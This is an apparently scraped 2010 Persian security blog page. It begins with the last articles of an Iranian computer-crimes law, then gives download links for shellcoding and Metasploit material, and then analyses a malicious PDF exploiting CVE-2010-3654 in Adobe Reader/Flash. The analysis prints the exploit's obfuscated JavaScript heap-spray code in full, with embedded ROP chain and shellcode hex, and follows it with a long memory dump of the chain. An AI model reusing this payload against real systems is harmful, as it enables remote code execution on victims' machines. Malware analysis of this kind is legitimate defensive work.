تبصره ـ در مواردی که در بخش دوم این قانون برای رسیدگی به جرایم رایانه ای مقررات خاصی از جهت آیین دادرسی پیش بینی نشده است طبق مقررات قانون آیین دادرسی کیفری اقدام خواهد شد.
ماده (54) میزان جزاهای نقدی این قانون بر اساس نرخ رسمی تورم حسب اعلام بانک مرکزی هر سه سال یک بار با پیشنهاد رئیس قوه قضاییه و تصویب هیأت وزیران قابل تغییر است.
ماده (55) وزارت دادگستری موظف است ظرف شش ماه از تاریخ تصویب این قانون با همکاری وزارت ارتباطات و فناوری اطلاعات آئین نامه های مربوط به جمع آوری و استنادپذیری ادله الکترونیکی را تهیه کند و به تصویب رئیس قوة قضائیه خواهد رسید.
ماده (56) قوانین و مقررات مغایر با این قانون ملغی است.

Friday, December 3, 2010

Shellcoding for linux & windows




Linux Shellcoding
- Example 1 - Making a Quick Exit
- Example 2 - Saying Hello
- Example 3 - Spawning a Shell
Windows Shellcoding
- Example 1 - Sleep is for the Weak
- Example 2 - A Message to say "Hey"
- Example 3 - Adding an Administrative Account
Advanced Shellcoding Methods
- Printable Shellcode
Conclusion
Further Reading/Attributions

download link = http://www.mediafire.com/?axfe98sk9vya9sk
pass = e-omidfar.blogspot.com

writing msf plug in






download link = http://www.mediafire.com/?gxkfgob2d11ob1j
pass = e-omidfar.blogspot.com

The Art Of Software Security Assessment

 Part I:  Introduction to Software Security Assessment 
            Chapter 1.  Software Vulnerability Fundamentals 
        Introduction 
        Vulnerabilities 
        The Necessity of Auditing 
        Classifying Vulnerabilities 
        Common Threads 
        Summary 
            Chapter 2.  Design Review 
        Introduction 
        Software Design Fundamentals 
        Enforcing Security Policy 
        Threat Modeling 
        Summary 
            Chapter 3.  Operational Review 
        Introduction 
        Exposure 
        Web-Specific Considerations 
        Protective Measures 
        Summary 
            Chapter 4.  Application Review Process 
        Introduction 
        Overview of the Application Review Process 
        Preassessment 
        Application Review 
        Documentation and Analysis 
        Reporting and Remediation Support 
        Code Navigation 
        Code-Auditing Strategies 
        Code-Auditing Tactics 
        Code Auditor's Toolbox 
        Case Study: OpenSSH 
        Summary 
 Part II:  Software Vulnerabilities 
            Chapter 5.  Memory Corruption 
        Introduction 
        Buffer Overflows 
        Shellcode 
        Protection Mechanisms 
        Assessing Memory Corruption Impact 
        Summary 
            Chapter 6.  C Language Issues 
        Introduction 
        C Language Background 
        Data Storage Overview 
        Arithmetic Boundary Conditions 
        Type Conversions 
        Type Conversion Vulnerabilities 
        Operators 
        Pointer Arithmetic 
        Other C Nuances 
        Summary 
            Chapter 7.  Program Building Blocks 
        Introduction 
        Auditing Variable Use 
        Auditing Control Flow 
        Auditing Functions 
        Auditing Memory Management 
        Summary 
            Chapter 8.  Strings and Metacharacters 
        Introduction 
        C String Handling 
        Metacharacters 
        Common Metacharacter Formats 
        Metacharacter Filtering 
        Character Sets and Unicode 
        Summary 
            Chapter 9.  UNIX I: Privileges and Files 
        Introduction 
        UNIX 101 
        Privilege Model 
        Privilege Vulnerabilities 
        File Security 
        File Internals 
        Links 
        Race Conditions 
        Temporary Files 
        The Stdio File Interface 
        Summary 
            Chapter 10.  UNIX II: Processes 
        Introduction 
        Processes 
        Program Invocation 
        Process Attributes 
        Interprocess Communication 
        Remote Procedure Calls 
        Summary 
            Chapter 11.  Windows I: Objects and the File System 
        Introduction 
        Background 
        Objects 
        Sessions 
        Security Descriptors 
        Processes and Threads 
        File Access 
        The Registry 
        Summary 
            Chapter 12.  Windows II: Interprocess Communication 
        Introduction 
        Windows IPC Security 
        Window Messaging 
        Pipes 
        Mailslots 
        Remote Procedure Calls 
        COM 
        Summary 
            Chapter 13.  Synchronization and State 
        Introduction 
        Synchronization Problems 
        Process Synchronization 
        Signals 
        Threads 
        Summary 
 Part III:  Software Vulnerabilities in Practice 
            Chapter 14.  Network Protocols 
        Introduction 
        Internet Protocol 
        User Datagram Protocol 
        Transmission Control Protocol 
        Summary 
            Chapter 15.  Firewalls 
        Introduction 
        Overview of Firewalls 
        Stateless Firewalls 
        Simple Stateful Firewalls 
        Stateful Inspection Firewalls 
        Spoofing Attacks 
        Summary 
            Chapter 16.  Network Application Protocols 
        Introduction 
        Auditing Application Protocols 
        Hypertext Transfer Protocol 
        Internet Security Association and Key Management Protocol 
        Abstract Syntax Notation (ASN.1) 
        Domain Name System 
        Summary 
            Chapter 17.  Web Applications 
        Introduction 
        Web Technology Overview 
        HTTP 
        State and HTTP Authentication 
        Architecture 
        Problem Areas 
        Common Vulnerabilities 
        Harsh Realities of the Web 
        Auditing Strategy 
        Summary 
            Chapter 18.  Web Technologies 
        Introduction 
        Web Services and Service-Oriented Architecture 
        Web Application Platforms 
        CGI 
        Perl 
        PHP 
        Java 
        ASP 
        ASP.NET 
download link = http://www.mediafire.com/?bm2cz3zzlccpf88
password = e-omidfar.blogspot.com

Saturday, November 27, 2010

CVE-2010-3654

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654

des :

Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.


---

pdf file (uncompressed)

PDF Comment %PDF-1.7



PDF Comment %âãÏÓ




obj 26 0

 Type:

 Referencing:


<</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>



 <<

   /Linearized 1

   /L 241680

   /O 29

   /E 6094

   /N 1

   /T 241354

   /H [ 513 208]

 >>



<</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>



obj 37 0

 Type: /XRef

 Referencing: 25 0 R, 27 0 R

 Contains stream


<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<BFEF0C62A7E9A94FAAEC52A3E6C8279A><CF478FAC136BCC4BA27379A9D0BF1937>]/Index[26 47]/Info 25 0 R/Length 66/Prev 241355/Root 27 0 R/Size 73/Type/XRef/W[1 2 1]>>


 <<

   /DecodeParms /Columns 4

   /Predictor 12

 >>


  </pre>


pdf file (compressed)

%PDF-1.7

%âãÏÓ

26 0 obj

<</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>

endobj

               

37 0 obj

<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<BFEF0C62A7E9A94FAAEC52A3E6C8279A><CF478FAC136BCC4BA27379A9D0BF1937>]/Index[26 47]/Info 25 0 R/Length 66/Prev 241355/Root 27 0 R/Size 73/Type/XRef/W[1 2 1]>>stream

hÞbbd ``b`: $ 

----

virus total analyse

Antivirus     Version     Last Update     Result

AhnLab-V3     2010.11.02.00     2010.11.01     PDF/Cve-2010-3654

AntiVir     7.10.13.77     2010.11.01     -

Antiy-AVL     2.0.3.7     2010.11.01     Exploit/Win32.CVE-2010-3654

Authentium     5.2.0.5     2010.11.01     -

Avast     4.8.1351.0     2010.11.01     JS:Pdfka-gen

Avast5     5.0.594.0     2010.11.01     JS:Pdfka-gen

AVG     9.0.0.851     2010.11.02     Exploit_c.NLK

BitDefender     7.2     2010.11.02     Exploit.PDF-JS.Gen

CAT-QuickHeal     11.00     2010.10.26     -

ClamAV     0.96.2.0-git     2010.11.02     BC.PDF.Parser-4.MalwareFound

Comodo     6583     2010.11.01     -

DrWeb     5.0.2.03300     2010.11.02     -

Emsisoft     5.0.0.50     2010.11.02     Exploit.Win32.CVE-2010-3654!IK

eSafe     7.0.17.0     2010.11.01     -

eTrust-Vet     36.1.7948     2010.11.01     PDF/CVE-2010-3654!exploit

F-Prot     4.6.2.117     2010.11.01     W32/Heuristic-XEN!Eldorado

F-Secure     9.0.16160.0     2010.11.02     Exploit:W32/Pidief.CSR

Fortinet     4.2.249.0     2010.11.01     JS/Agent.FSH!exploit

GData     21     2010.11.02     Exploit.PDF-JS.Gen

Ikarus     T3.1.1.90.0     2010.11.02     Exploit.Win32.CVE-2010-3654

Jiangmin     13.0.900     2010.11.01     -

K7AntiVirus     9.67.2882     2010.11.01     -

Kaspersky     7.0.0.125     2010.11.01     Exploit.Win32.CVE-2010-3654.a

McAfee     5.400.0.1158     2010.11.02     -

McAfee-GW-Edition     2010.1C     2010.11.01     Heuristic.BehavesLike.PDF.Suspicious.O

Microsoft     1.6301     2010.11.01     Exploit:Win32/Pdfjsc.gen!A

NOD32     5583     2010.11.01     JS/Exploit.Pdfka.OKB

Norman     6.06.10     2010.11.01     JS/CVE-2010-3654.A

nProtect     2010-11-01.01     2010.11.01     Exploit.PDF-JS.Gen

Panda     10.0.2.7     2010.11.01     Exploit/PDF.Flash.A

PCTools     7.0.3.5     2010.11.02     Trojan.Pidief

Prevx     3.0     2010.11.02     -

Rising     22.71.06.04     2010.11.01     -

Sophos     4.59.0     2010.11.02     Troj/SWFLdr-V

Sunbelt     7190     2010.11.02     Exploit.PDF-JS.Gen (v)

SUPERAntiSpyware     4.40.0.1006     2010.11.02     -

Symantec     20101.2.0.161     2010.11.02     Trojan.Pidief

TheHacker     6.7.0.1.075     2010.11.02     -

TrendMicro     9.120.0.1004     2010.11.01     TROJ_PIDIEF.WV

TrendMicro-HouseCall     9.120.0.1004     2010.11.02     TROJ_PIDIEF.WV

VBA32     3.12.14.1     2010.11.01     -

ViRobot     2010.10.4.4074     2010.11.01     PDF.S.Exploit.241679

VirusBuster     12.70.15.0     2010.11.01     -

PEiD: -

packers (F-Prot): XORCrypt

packers (Kaspersky): Swf2Swc

PDFiD:

PDF Header: %PDF-1.7

obj 22

endobj 22

stream 19

endstream 19

xref 0

trailer 0

startxref 2

/Page 1

/Encrypt 0

/ObjStm 5

/JS 0

/JavaScript 0

/AA 0

/OpenAction 0

/AcroForm 0

/JBIG2Decode 0

/RichMedia 0

/Colors > 2^24 0

}

document information

content/type: PDF document, version 1.7

Object 4.0 @ 12391: suspicious.flash Embedded Flash

Object 4.0 @ 12391: flash.exploit CVE-2010-3654

Object 28.0 @ 945: suspicious.obfuscation using unescape

Object 28.0 @ 945: suspicious.string heap spray shellcode

Object 35.0 @ 4944: suspicious.flash Adobe Shockwave Flash in a PDF define obj type



---

now about exploit

first :

this is curvedPolygon.
function drawLines():void {

var i:int;

var n:int = vecPoints.length;

var vecCmds:Vector.<int> = new Vector.<int>();

var vecCoords:Vector.<Number> = new Vector.<Number>();

for(i=0; i<n; i++) {

vecCoords[2*i] = vecPoints[i].x;

vecCoords[2*i+1] = vecPoints[i].y;

}

vecCoords[2*n] = vecPoints[0].x;

vecCoords[2*n+1] = vecPoints[0].y;

for(i=0; i<=(n/2); i++) {

vecCmds[i] = 3; // This line creates "curveTo" commands

}

vecCmds[0] = 1;

shLines.graphics.clear();

shLines.graphics.lineStyle(1,0);

shLines.graphics.beginFill(0xFF0000);

shLines.graphics.drawPath(vecCmds, vecCoords,vecWind[rbgWind.selectedData]);

shLines.graphics.endFill();

} </pre>


source code of heap spray

var p = unescape;

var len = "\x6c\x65\x6e\x67\x74\x68";

var s2 = "\x73\x75\x62\x73\x74\x72\x69\x6e\x67";

var s3 = "\x73\x75\x62\x73\x74\x72";

function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__[s3](___,4);return _;}

function s()

{

c=p(a("58585858"));

while(c[len] + 20 + 8 < 0x10000) c = c + c;

b = c[s2](0,(0x5858-0x24)/2);

b += p(a("585858582fe10700deadbeefb00bface5868585849190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700909090902FE90005C300C08BD23302EB4240388075008BF9C3C2C08B8951240404EB088842400A8AC984F67500C68B002404C35A575601BE00003B0072D6300846083B4073D68BF85FC7C35E8B6430050000850078C08B0E0C40408B8B148B008B0010408BC33440808B00B8000090C33351EBD28B16C1CA03E1E183C1FF1DEACA0BD233108ACA33D18B80400038E57514898B242404C35A8B5583ECE4C456538B57085D458B890CFC45C38B81664D380F5AC28500008B003C40C30345898BF4F445388145500000850F00AB0000458B83F478C038830F009C840000830004780F00928400008B00F455528B8B7803C389D0F055558B83F0187A74008B7CF055528B032089D0E855558B8BF02452D00355898BECF055528B031C89D0E455458B8BF01878854F72FF4750F633458B8BE8B004C30337E8FFFF3BFF0C4537757D8300101D74458B8910F845458B0FEC04B78B70F05542035010FF53F8554589EBFC8B18EC45B70F7004558B8BE48204C3034589EBFC4604754F8BB3FC455E5F8B5B5DE50CC28D000040895124040CEB8040223806758940240405EB388075008BEF2404C35A8951240409EBF9807422880A40088A42840A75C9C6F10000048B5A248DC30040C4838DF82454330489C9240C028902EB02FF0A8B39807500EBF78B13800A5C390A75028B0489FF24240406EB0AFF023BE976048B5924C35A56535157F98BD88B006A806800006A006A026A00680200004000FF521253F08B006A006A006AFF562E53006A448D04248B50E8C7FDD8FFFF5750FF561653FF5622535F5A5B5E90C356535557C481FC58FFFF4C890424F28B04898B24241C7C83042475008D232444501804680001FF002A53448D18048B50E8C6FF4AFFFFD08BE858FD9AFFFF1CEB448D182468500104000053FF8D2A04448B182414C283E869FD7CFFFF006A806800006A006A036A00680100008000FF561253F08B006A806800006A006A026A00680200004000448D3024FF501253E88BFF337C83042475016A0E6A008B004E43565053FFEB2E6A0F6A008B004E4343035052FF562E53006A006A006AFF552E53448B0424E88372010F57BB8500006A008D0024445018906800018D00248401240000565053FF8D1A2484011800004B8ABA5601900000F5E8FFFC6AFF8D0024445018906800018D00248401240000555053FF811690C700013B00527BB1726AEB006A006A7568008A560053FF6A2E8D0024445018046A448D1824565053FF6A1A6A008B004E4343035052FF562E53006A448D18246A508D012444501CFF561A53448D10244B8ABA56000100007FE8FFFC6AFF8D0024445018016A448D1C24555053FF47167C3B0C24C472FF562253FF552253448B0424E88372010F0B90840000E900009F0000538D8D74248402A8000023E8FFFC8DFF74430BE8FFFC8DFF048402A80000548D18240BE8FFFC8DFF7443F3E8FFFB8BFF8DF02444E818FBE8FFFFF003848DA83400028D00CA930000E800FBE4FFFF448D182468500104000053FF8D2A04448D185F53CBE8FFFB8DFF248C02A80000548D1824048BE824FD98FFFF006A448D1C24FF502653006A53FFEB366A146A016A008D0024445024438D505A006A53FF8A4624448108A8C400035D005E5FC35B56535557C4838DF4246CC60424048B00E8D8FB9EFFFFF88B006A438B500EE857FBDCFFFFF08B7389850E74F65667438B500AE857FBC8FFFF4389830A0A7B74008D5301434589EB008B42004523E8FFFB89FF24448B080045FF500A53F88B448B08240140004514EB438B500E57568DE8FFFB8BFF0055028945830400458B8B00853075F683E30045FE04800B003BB97704C60124048A83240CC45F5D5B5E90C38B5581EC00C4FFFEE8FF000000002D583E4600404589B8FC3EAC0040450389FCF845458BE8F8FF36FFFFC0844074458BFFF8325017E8FFFCE8FFFC12FFFFD08B858DFE03FFFF21E8FFFC8DFF0395FFFEB9FF00010000458BE8F8FCAEFFFF958DFE03FFFFC933458BE8F8FC9EFFFFE58BC35DC08B6B027265656E336C0032FD89A4129B84F2502A7A38C6C54558D855450BE2EFE79554D616C0D6F74B016EDC95B929FD70A9D123B7C8AF2CB9E6FF0000000068736C65336C003241934574000000008A70000058000002007B0000706F6E657E006574706D622E74617E00652E65780000000000006970676E31203732302E302E312E2D20206E2033202661746B73696B6C6C2F206D6941207263626F7461652E65782F202066202661746B73696B6C6C2F206D6941207263526F33642E3278652065662F26202220000000220000909090900c900c0c0c0c"));

b += c;

d = b[s2](0,0x10000/2);

e = c[s2](0,0x8000-(0x1020-0x08)/2);

while(d[len] < 0x80000) d+=d;

_3 = d[s2](0,0x80000-(0x1020-0x08)/2);

_4= new Array();

_5 =    new Array();

for(i=0;i<0x300;i=i+1)

for(j=0;j<16;j++)

 _5[i*16+j]=e+"y";


for(i=0;i<0x300;i=i+1)

for(j=0;j<15;j++)

 _5[i*16+j]=null;



for(i=0;i<0x280;i=i+1)    _4[i]                =_3        + "s";

}

s(); 
}


exploit use rop technology 

58585854   58585858

58585858   07002FE1  BIB.07002FE1

5858585C   BEEFDEAD

58585860   FACEB00B

58585864   58585868

58585868   07004919  BIB.07004919

5858586C   CCCCCCCC

58585870   070048EF  BIB.070048EF   

58585874   0700156F  BIB.0700156F

58585878   CCCCCCCC

5858587C   07009084  BIB.07009084

58585880   07009084  BIB.07009084

58585884   07009084  BIB.07009084

58585888   07009084  BIB.07009084

5858588C   07009084  BIB.07009084

58585890   07009084  BIB.07009084

58585894   07009033  BIB.07009033

58585898   07009084  BIB.07009084

5858589C   0C0C0C0C 

585858A0   07009084  BIB.07009084

585858A4   07009084  BIB.07009084

585858A8   07009084  BIB.07009084

585858AC   07009084  BIB.07009084

585858B0   07009084  BIB.07009084

585858B4   07009084  BIB.07009084

585858B8   07009084  BIB.07009084

585858BC   07009084  BIB.07009084

585858C0   07001599  BIB.07001599

585858C4   00010124  UNICODE "Q:="

585858C8   070072F7  BIB.070072F7

585858CC   00010104  UNICODE "=N:="

585858D0   070015BB  BIB.070015BB

585858D4   00001000

585858D8   0700154D  BIB.0700154D

585858DC   070015BB  BIB.070015BB

585858E0   7FFE0300

585858E4   07007FB2  BIB.07007FB2

585858E8   070015BB  BIB.070015BB

585858EC   00010011

585858F0   0700A8AC  BIB.0700A8AC

585858F4   070015BB  BIB.070015BB

585858F8   00010100

585858FC   0700A8AC  BIB.0700A8AC

58585900   070072F7  BIB.070072F7

58585904   00010011

58585908   070052E2  BIB.070052E2

5858590C   07005C54  BIB.07005C54

58585910   FFFFFFFF

58585914   00010100

58585918   00000000

5858591C   00010104  UNICODE "=N:="

58585920   00001000

58585924   00000040

58585928   0700D731  BIB.0700D731

5858592C   070015BB  BIB.070015BB

58585930   9054905A

58585934   0700154D  BIB.0700154D

58585938   0700A722  BIB.0700A722

5858593C   070015BB  BIB.070015BB

58585940   5815EB5A 

58585944   0700154D  BIB.0700154D

58585948   0700A722  BIB.0700A722

5858594C   070015BB  BIB.070015BB

58585950   18891A8B

58585954   0700154D  BIB.0700154D

58585958   0700A722  BIB.0700A722

5858595C   070015BB  BIB.070015BB

58585960   8304C083

58585964   0700154D  BIB.0700154D

58585968   0700A722  BIB.0700A722

5858596C   070015BB  BIB.070015BB

58585970   FB8104C2

58585974   0700154D  BIB.0700154D

58585978   0700A722  BIB.0700A722

5858597C   070015BB  BIB.070015BB

58585980   0C0C0C0C 

58585984   0700154D  BIB.0700154D

58585988   0700A722  BIB.0700A722

5858598C   070015BB  BIB.070015BB

58585990   05EBEE75 

58585994   0700154D  BIB.0700154D

58585998   0700A722  BIB.0700A722

5858599C   070015BB  BIB.070015BB

585859A0   FFFFE6E8

585859A4   0700154D  BIB.0700154D

585859A8   0700A722  BIB.0700A722

585859AC   070015BB  BIB.070015BB

585859B0   909090FF

585859B4   0700154D  BIB.0700154D

585859B8   0700A722  BIB.0700A722

585859BC   070015BB  BIB.070015BB

585859C0   90909090

585859C4   0700154D  BIB.0700154D

585859C8   0700A722  BIB.0700A722

585859CC   070015BB  BIB.070015BB

585859D0   90909090

585859D4   0700154D  BIB.0700154D

585859D8   0700A722  BIB.0700A722

585859DC   070015BB  BIB.070015BB

585859E0   90FFFFFF

585859E4   0700154D  BIB.0700154D

585859E8   0700D731  BIB.0700D731

585859EC   0700112F  BIB.0700112F

585859F0   90909090

585859F4   00052FE9

585859F8   C08BC300

585859FC   02EBD233

58585A00   38804240 

58585A04   8BF97500

58585A08   C08BC3C2

58585A0C   24048951

58585A10   088804EB

58585A14   0A8A4240

58585A18   F675C984

58585A1C   8B0000C6

58585A20   C35A2404

58585A24   01BE5756  AcroRd_1.01BE5756

58585A28   3B000000 

58585A2C   300872D6 

58585A30   3B404608 

58585A34   8BF873D6

58585A38   C35E5FC7

58585A3C   30058B64 

58585A40   85000000

58585A44   8B0E78C0

58585A48   408B0C40

58585A4C   8B008B14

58585A50   10408B00

58585A54   34408BC3 

58585A58   00B8808B  AcroRd_1.00B8808B

58585A5C   90C30000

58585A60   EBD23351

58585A64   C1CA8B16

58585A68   E18303E1

58585A6C   1DEAC1FF

58585A70   D233CA0B

58585A74   CA33108A

58585A78   8040D18B

58585A7C   E5750038

58585A80   8B241489

58585A84   C35A2404

58585A88   83EC8B55

58585A8C   5653E4C4 

58585A90   085D8B57

58585A94   890C458B

58585A98   C38BFC45

58585A9C   4D388166

58585AA0   C2850F5A

58585AA4   8B000000

58585AA8   C3033C40

58585AAC   8BF44589

58585AB0   3881F445 

58585AB4   00004550

58585AB8   00AB850F  AcroRd_1.00AB850F

58585ABC   458B0000

58585AC0   78C083F4

58585AC4   0F003883

58585AC8   00009C84

58585ACC   04788300 

58585AD0   92840F00

58585AD4   8B000000

58585AD8   528BF455

58585ADC   03C38B78

58585AE0   F05589D0

58585AE4   83F0558B

58585AE8   7400187A

58585AEC   F0558B7C

58585AF0   0320528B

58585AF4   E85589D0

58585AF8   8BF0558B

58585AFC   D0032452

58585B00   8BEC5589

58585B04   528BF055

58585B08   89D0031C

58585B0C   458BE455 

58585B10   18788BF0

58585B14   72FF854F

58585B18   F6334750

58585B1C   8BE8458B

58585B20   C303B004

58585B24   FFFF37E8

58585B28   0C453BFF

58585B2C   7D833775

58585B30   1D740010

58585B34   8910458B

58585B38   458BF845 

58585B3C   04B70FEC

58585B40   F0558B70

58585B44   50104203

58585B48   F855FF53

58585B4C   EBFC4589

58585B50   EC458B18

58585B54   7004B70F

58585B58   8BE4558B

58585B5C   C3038204

58585B60   EBFC4589

58585B64   754F4604

58585B68   FC458BB3

58585B6C   8B5B5E5F

58585B70   0CC25DE5

58585B74   00408D00  AcroRd32.00408D00

58585B78   24048951

58585B7C   80400CEB

58585B80   06752238 

58585B84   24048940

58585B88   388005EB 

58585B8C   8BEF7500

58585B90   C35A2404

58585B94   24048951

58585B98   F98009EB

58585B9C   880A7422

58585BA0   8A424008

58585BA4   75C9840A

58585BA8   0000C6F1

58585BAC   5A24048B 

58585BB0   00408DC3  AcroRd32.00408DC3

58585BB4   8DF8C483

58585BB8   33042454 

58585BBC   240C89C9

58585BC0   02EB0289

58585BC4   0A8B02FF

58585BC8   75003980

58585BCC   8B13EBF7

58585BD0   5C39800A 

58585BD4   028B0A75  xpsp2res.028B0A75

58585BD8   FF240489

58585BDC   06EB2404 

58585BE0   023B0AFF

58585BE4   048BE976

58585BE8   C35A5924

58585BEC   51575653 

58585BF0   D88BF98B

58585BF4   8068006A

58585BF8   6A000000

58585BFC   6A006A02

58585C00   00006802

58585C04   FF524000

58585C08   F08B1253

58585C0C   006A006A

58585C10   FF56006A

58585C14   006A2E53

58585C18   0424448D

58585C1C   E8C78B50

58585C20   FFFFFDD8

58585C24   FF565750

58585C28   FF561653

58585C2C   5F5A2253 

58585C30   90C35B5E

58585C34   55575653 

58585C38   FC58C481

58585C3C   4C89FFFF

58585C40   F28B0424

58585C44   8B240489

58585C48   7C83241C  kernel32.7C83241C

58585C4C   75000424

58585C50   24448D23

58585C54   04685018

58585C58   FF000001

58585C5C   448D2A53 

58585C60   8B501804

58585C64   FF4AE8C6

58585C68   D08BFFFF

58585C6C   FD9AE858

58585C70   1CEBFFFF

58585C74   1824448D

58585C78   01046850  RETURN to AcroRd_1.01046850 from AcroRd_1.0104FC7B

58585C7C   53FF0000 

58585C80   04448D2A

58585C84   24148B18

58585C88   E869C283

58585C8C   FFFFFD7C

58585C90   8068006A

58585C94   6A000000

58585C98   6A006A03

58585C9C   00006801

58585CA0   FF568000

58585CA4   F08B1253

58585CA8   8068006A

58585CAC   6A000000

58585CB0   6A006A02

58585CB4   00006802

58585CB8   448D4000 

58585CBC   FF503024

58585CC0   E88B1253

58585CC4   7C83FF33  kernel32.7C83FF33

58585CC8   75010424

58585CCC   6A006A0E

58585CD0   4E438B00

58585CD4   53FF5650 

58585CD8   6A0FEB2E

58585CDC   8B006A00

58585CE0   43034E43

58585CE4   FF565052

58585CE8   006A2E53

58585CEC   006A006A

58585CF0   2E53FF55

58585CF4   0424448B

58585CF8   7201E883

58585CFC   BB850F57

58585D00   6A000000

58585D04   24448D00

58585D08   90685018

58585D0C   8D000001

58585D10   01242484  AcroRd_1.01242484

58585D14   56500000 

58585D18   8D1A53FF

58585D1C   01182484  ASCII "in control of the screen. Your keyboard and mouse input will now affect the sharer's desktop."

58585D20   4B8A0000

58585D24   0190BA56  AcroRd_1.0190BA56

58585D28   F5E80000

58585D2C   6AFFFFFC

58585D30   24448D00

58585D34   90685018

58585D38   8D000001

58585D3C   01242484  AcroRd_1.01242484

58585D40   55500000 

58585D44   811653FF

58585D48   000190C7

58585D4C   527B3B00 

58585D50   6AEBB172

58585D54   006A006A

58585D58   008A7568

58585D5C   53FF5600 

58585D60   8D006A2E

58585D64   50182444

58585D68   448D046A 

58585D6C   56501824 

58585D70   6A1A53FF

58585D74   8B006A00

58585D78   43034E43

58585D7C   FF565052

58585D80   006A2E53

58585D84   1824448D

58585D88   8D016A50

58585D8C   501C2444 

58585D90   1A53FF56

58585D94   1024448D

58585D98   BA564B8A

58585D9C   00000001

58585DA0   FFFC7FE8

58585DA4   8D006AFF

58585DA8   50182444

58585DAC   448D016A 

58585DB0   55501C24 

58585DB4   471653FF

58585DB8   0C247C3B

58585DBC   FF56C472

58585DC0   FF552253

58585DC4   448B2253

58585DC8   E8830424

58585DCC   0F0B7201

58585DD0   00009084

58585DD4   009FE900  RETURN to AcroRd_1.009FE900 from AcroRd_1.009FF9D6

58585DD8   538D0000 

58585DDC   24848D74

58585DE0   000002A8

58585DE4   FFFC23E8

58585DE8   74438DFF

58585DEC   FFFC0BE8

58585DF0   04848DFF

58585DF4   000002A8

58585DF8   1824548D

58585DFC   FFFC0BE8

58585E00   74438DFF

58585E04   FFFBF3E8

58585E08   8DF08BFF

58585E0C   E8182444

58585E10   FFFFFBE8

58585E14   848DF003

58585E18   0002A834

58585E1C   CA938D00

58585E20   E8000000

58585E24   FFFFFBE4

58585E28   1824448D

58585E2C   01046850  RETURN to AcroRd_1.01046850 from AcroRd_1.0104FC7B

58585E30   53FF0000 

58585E34   04448D2A

58585E38   5F538D18 

58585E3C   FFFBCBE8

58585E40   248C8DFF

58585E44   000002A8

58585E48   1824548D

58585E4C   E824048B

58585E50   FFFFFD98

58585E54   448D006A 

58585E58   FF501C24

58585E5C   006A2653

58585E60   EB3653FF

58585E64   6A016A14

58585E68   8D006A00

58585E6C   50242444 

58585E70   505A438D 

58585E74   53FF006A 

58585E78   24448A46

58585E7C   A8C48108

58585E80   5D000003 

58585E84   C35B5E5F

58585E88   55575653 

58585E8C   8DF4C483

58585E90   C604246C

58585E94   8B002404

58585E98   FB9EE8D8

58585E9C   F88BFFFF

58585EA0   438B006A

58585EA4   E857500E

58585EA8   FFFFFBDC

58585EAC   7389F08B

58585EB0   74F6850E

58585EB4   438B5667

58585EB8   E857500A

58585EBC   FFFFFBC8

58585EC0   830A4389

58585EC4   74000A7B

58585EC8   01438D53  ASCII "@ZU?$less@G@std@@V?$ASAllocator@U?$pair@$$CBGP8Acrobat@AFModel@@AEXABVVal@AFFramework@@@Z@std@@@@$0A@@std@@@std@@"

58585ECC   EB004589

58585ED0   00458B42

58585ED4   FFFB23E8

58585ED8   244489FF

58585EDC   00458B08

58585EE0   0A53FF50

58585EE4   448BF88B

58585EE8   01400824  AcroRd_1.01400824

58585EEC   14EB0045

58585EF0   500E438B

58585EF4   8DE85756

58585EF8   8BFFFFFB

58585EFC   02890055  xpsp2res.02890055

58585F00   04004583 

58585F04   8B00458B

58585F08   75F68530

58585F0C   004583E3

58585F10   800BFE04

58585F14   B977003B

58585F18   012404C6  ASCII "Resolution"

58585F1C   8324048A

58585F20   5F5D0CC4 

58585F24   90C35B5E

58585F28   81EC8B55

58585F2C   FFFE00C4

58585F30   0000E8FF

58585F34   2D580000

58585F38   00403E46  AcroRd32.00403E46

58585F3C   B8FC4589

58585F40   00403EAC  AcroRd32.00403EAC

58585F44   89FC4503

58585F48   458BF845 

58585F4C   FF36E8F8

58585F50   C084FFFF

58585F54   458B4074

58585F58   3250FFF8 

58585F5C   FFFC17E8

58585F60   FC12E8FF

58585F64   D08BFFFF

58585F68   FE03858D

58585F6C   21E8FFFF 

58585F70   8DFFFFFC

58585F74   FFFE0395

58585F78   0001B9FF

58585F7C   458B0000

58585F80   FCAEE8F8

58585F84   958DFFFF

58585F88   FFFFFE03

58585F8C   458BC933 

58585F90   FC9EE8F8

58585F94   E58BFFFF

58585F98   C08BC35D

58585F9C   72656B02

58585FA0   336C656E 

58585FA4   FD890032

58585FA8   9B84A412

58585FAC   2A7AF250

58585FB0   C54538C6

58585FB4   554558D8

58585FB8   EFE70BE2

58585FBC   D6169554

58585FC0   F74BC0D6

58585FC4   DC95016E

58585FC8   FD70B929

58585FCC   23B7A9D1

58585FD0   2CB9C8AF

58585FD4   0000E6FF

58585FD8   68730000

58585FDC   336C6C65 

58585FE0   41930032

58585FE4   00004574

58585FE8   8A700000

58585FEC   58000000 

58585FF0   007B0002

58585FF4   706F0000

58585FF8   7E006E65

58585FFC   706D6574

58586000   7461622E

58586004   652E7E00

58586008   00006578

5858600C   00000000

58586010   676E6970

